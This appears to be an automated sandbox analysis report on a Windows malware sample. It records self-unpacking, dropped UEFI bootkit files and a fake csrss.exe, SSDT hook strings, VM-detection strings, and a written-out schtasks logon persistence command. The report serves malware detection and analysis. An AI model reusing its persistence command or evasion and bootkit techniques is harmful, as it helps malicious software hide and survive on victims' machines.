            Source: Binary string: dbghelp.pdb source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp
            Source: Binary string: C:\Users\Admin\source\repos\ssdt-master\SSDT\win10x64\x64\Release\SSDTHook.pdb source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmp, csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmp, csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmp
            Source: Binary string: dbghelp.pdbGCTL source: 1dyvctHqv1.exe, 00000000.00000002.297249068.0000000000A59000.00000040.00020000.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.325330645.0000000000A59000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.558250482.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.375404564.0000000006608000.00000004.00000001.sdmp, csrss.exe, 00000021.00000002.419236138.0000000005D59000.00000040.00000001.sdmp, csrss.exe, 00000027.00000002.403570364.0000000000A59000.00000040.00020000.sdmp

            Data Obfuscation:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeUnpacked PE file: 0.2.1dyvctHqv1.exe.400000.1.unpack
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeUnpacked PE file: 12.2.1dyvctHqv1.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 17.2.csrss.exe.400000.3.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 31.2.csrss.exe.400000.1.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 33.2.csrss.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 39.2.csrss.exe.400000.0.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.2.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 52.2.csrss.exe.400000.3.unpack
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 52.2.csrss.exe.400000.3.unpack
            Detected unpacking (changes PE section rights)Show sources
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeUnpacked PE file: 0.2.1dyvctHqv1.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeUnpacked PE file: 12.2.1dyvctHqv1.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 17.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 31.2.csrss.exe.400000.1.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 33.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 39.2.csrss.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 50.2.csrss.exe.400000.2.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: C:\Windows\rss\csrss.exeUnpacked PE file: 52.2.csrss.exe.400000.3.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.symtab:R;
            Source: injector.exe.17.drStatic PE information: section name: _RDATA
            Source: windefender.exe.17.drStatic PE information: section name: UPX2
            Source: bootmgfw.efi.17.drStatic PE information: section name: .xdata
            Source: bootx64.efi.17.drStatic PE information: section name: .xdata
            Source: EfiGuardDxe.efi.17.drStatic PE information: section name: .xdata
            Source: NtQuerySystemInformationHook.dll.17.drStatic PE information: section name: _RDATA
            Source: windefender.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x20ae45
            Source: bootx64.efi.17.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
            Source: NtQuerySystemInformationHook.dll.17.drStatic PE information: real checksum: 0x0 should be: 0x2279d
            Source: csrss.exe.12.drStatic PE information: real checksum: 0x45a4d9 should be: 0x45c023
            Source: EfiGuardDxe.efi.17.drStatic PE information: real checksum: 0x4a5a6 should be: 0x51a75
            Source: injector.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x54ea2
            Source: 1dyvctHqv1.exeStatic PE information: real checksum: 0x45a4d9 should be: 0x45c023
            Source: bootmgfw.efi.17.drStatic PE information: real checksum: 0x2199 should be: 0x4c78
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1

            Persistence and Installation Behavior:

            barindex
            Creates files in the system32 config directoryShow sources
            Source: C:\Windows\System32\netsh.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\PeerDistRepubJump to behavior
            Drops executables to the windows directory (C:\Windows) and starts themShow sources
            Source: C:\Windows\System32\fodhelper.exeExecutable created and started: C:\Windows\rss\csrss.exe
            Drops PE files with benign system namesShow sources
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Boot\old.efi (copy)Jump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exeJump to dropped file
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dllJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\EfiGuardDxe.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Boot\bootx64.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\EFI\Microsoft\Boot\bootmgfw.efiJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: B:\EFI\Microsoft\Boot\fw.efi (copy)Jump to dropped file
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeFile created: C:\Windows\rss\csrss.exeJump to dropped file
            Source: C:\Windows\rss\csrss.exeFile created: C:\Windows\windefender.exeJump to dropped file

            Boot Survival:

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
            Source: C:\Windows\rss\csrss.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
            Creates an autostart registry key pointing to binary in C:\WindowsShow sources
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EmptySmokeJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EmptySmokeJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EmptySmokeJump to behavior

            Hooking and other Techniques for Hiding and Protection:

            barindex
            May modify the system service descriptor table (often done to hook functions)Show sources
            Source: 1dyvctHqv1.exe, 00000000.00000003.288501264.0000000005C6A000.00000004.00000001.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: 1dyvctHqv1.exe, 0000000C.00000003.308140733.0000000005E2A000.00000004.00000001.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000011.00000003.333882366.000000000638A000.00000004.00000001.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 0000001F.00000002.404110892.0000000000400000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000021.00000002.416342810.0000000005700000.00000040.00000001.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: KeServiceDescriptorTable
            Source: C:\Windows\System32\svchost.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\1dyvctHqv1.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\netsh.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\rss\csrss.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: TOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD RST MARKERBAD ALLOCCOUNTBAD RECORD MACBAD SPAN STATEBAD STACK SIZEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDEXIT STATUS -1FILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDLOOKUP TXT: %WMEMPROFILERATENEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREPORT_ID IS 0RUNTIME: BASE=RUNTIME: FULL=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIMEENDPERIODTOO MANY LINKSTOO MANY USERSUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN MARKERUNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WORK.FULL != 0X509IGNORECN=1XENSERVICE.EXEZERO PARAMETER WITH GC PROG
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmpBinary or memory string: VMUSRVC.EXE
            Source: csrss.exeBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGE
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332796941.00000000160F6000.00000004.00000001.sdmpBinary or memory string: SHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXEWMIPRVSE.EXEWMIPRVSE.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXECONHOST.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXEUSOCLIENT.EXEUSOCLIENT.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXEDLLHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXESGRMBROKER.EXESHAREDINTAPP.EXESHAREDINTAPP.EXESVCHOST.EXESHAREDINTAPP.EXE1DYVCTHQV1.EXESHAREDINTAPP.EXEVMSRVC.EXEVMUSRVC.EXESEARCHUI.EXESEARCHUI.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEHXTSR.EXEHXTSR.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXEWMIPRVSE.EXEWMIPRVSE.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESGRMBROKER.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXE1DYVCTHQV1.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXESERVICES.EXELSASS.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXESVCHOST.EXEDWM.EXESVCHOST.EXEC:\WINDOWSPATHEXTNUL
            Source: 1dyvctHqv1.exe, 00000000.00000002.299005665.0000000004FE0000.00000040.00000001.sdmp, 1dyvctHqv1.exe, 0000000C.00000002.324236877.0000000000400000.00000040.00020000.sdmp, csrss.exe, 00000011.00000002.555649640.0000000005700000.00000040.00000001.sdmp, csrss.exe, 0000001F.00000003.374222629.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000021.00000003.362473269.0000000005FB0000.00000004.00000001.sdmp, csrss.exe, 00000027.00000002.395183871.0000000000400000.00000040.00020000.sdmpBinary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETESTING KEYTTL EXPIREDVBOXSERVICEVMUSRVC.EXEVT_RESERVEDVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEALARM CLOCKAPPLICATIONBAD ADDRESSBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCOMPAIGN_IDCREATED BY CRYPT32.DLLDNSMESSAGE.E2.KEFF.ORGEMBEDDED/%SFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEHTTPS_PROXYI/O TIMEOUTLOCAL ERRORLOST MCACHEMSPANMANUALMETHODARGS(MSWSOCK.DLLNEXT SERVERNIL CONTEXTORANNIS.COMPARSE ERRORPROCESS: %SRAW-CONTROLREFLECT.SETRETRY-AFTERRUNTIME: P RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITETASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION=183WININET.DLLWUP_PROCESS (SENSITIVE) [RECOVERED] ALLOCCOUNT FOUND AT *( GCSCANDONE M->GSIGNAL= MINTRIGGER= NDATAROOTS= NSPANROOTS= PAGES/BYTE
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: VMXNET[SYSTEM PROCESS]VMSRVC.EXEVMUSRVC.EXESYSTEMSYSTEMVMSRVC.EXEVMUSRVC.EXEREGISTRYREGISTRY
            Source: 1dyvctHqv1.exe, 0000000C.00000002.332634985.00000000160CE000.00000004.00000001.sdmpBinary or memory string: VMSRVC.EXEVMUSRVC.EXESMSS.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWININIT.EXEVMSRVC.EXEVMUSRVC.EXECSRSS.EXEVMSRVC.EXEVMUSRVC.EXEWINLOGON.EXEVMSRVC.EXEVMUSRVC.EXESERVICES.EXEVMSRVC.EXEVMUSRVC.EXELSASS.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDWM.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESPOOLSV.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESIHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXECTFMON.EXEVMSRVC.EXEVMUSRVC.EXEEXPLORER.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXECONHOST.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXEUSOCLIENT.EXEUSOCLIENT.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUSRVC.EXEDLLHOST.EXEVMSRVC.EXEVMUSRVC.EXESVCHOST.EXEVMSRVC.EXEVMUSRVC.EXEVMSRVC.EXEVMUS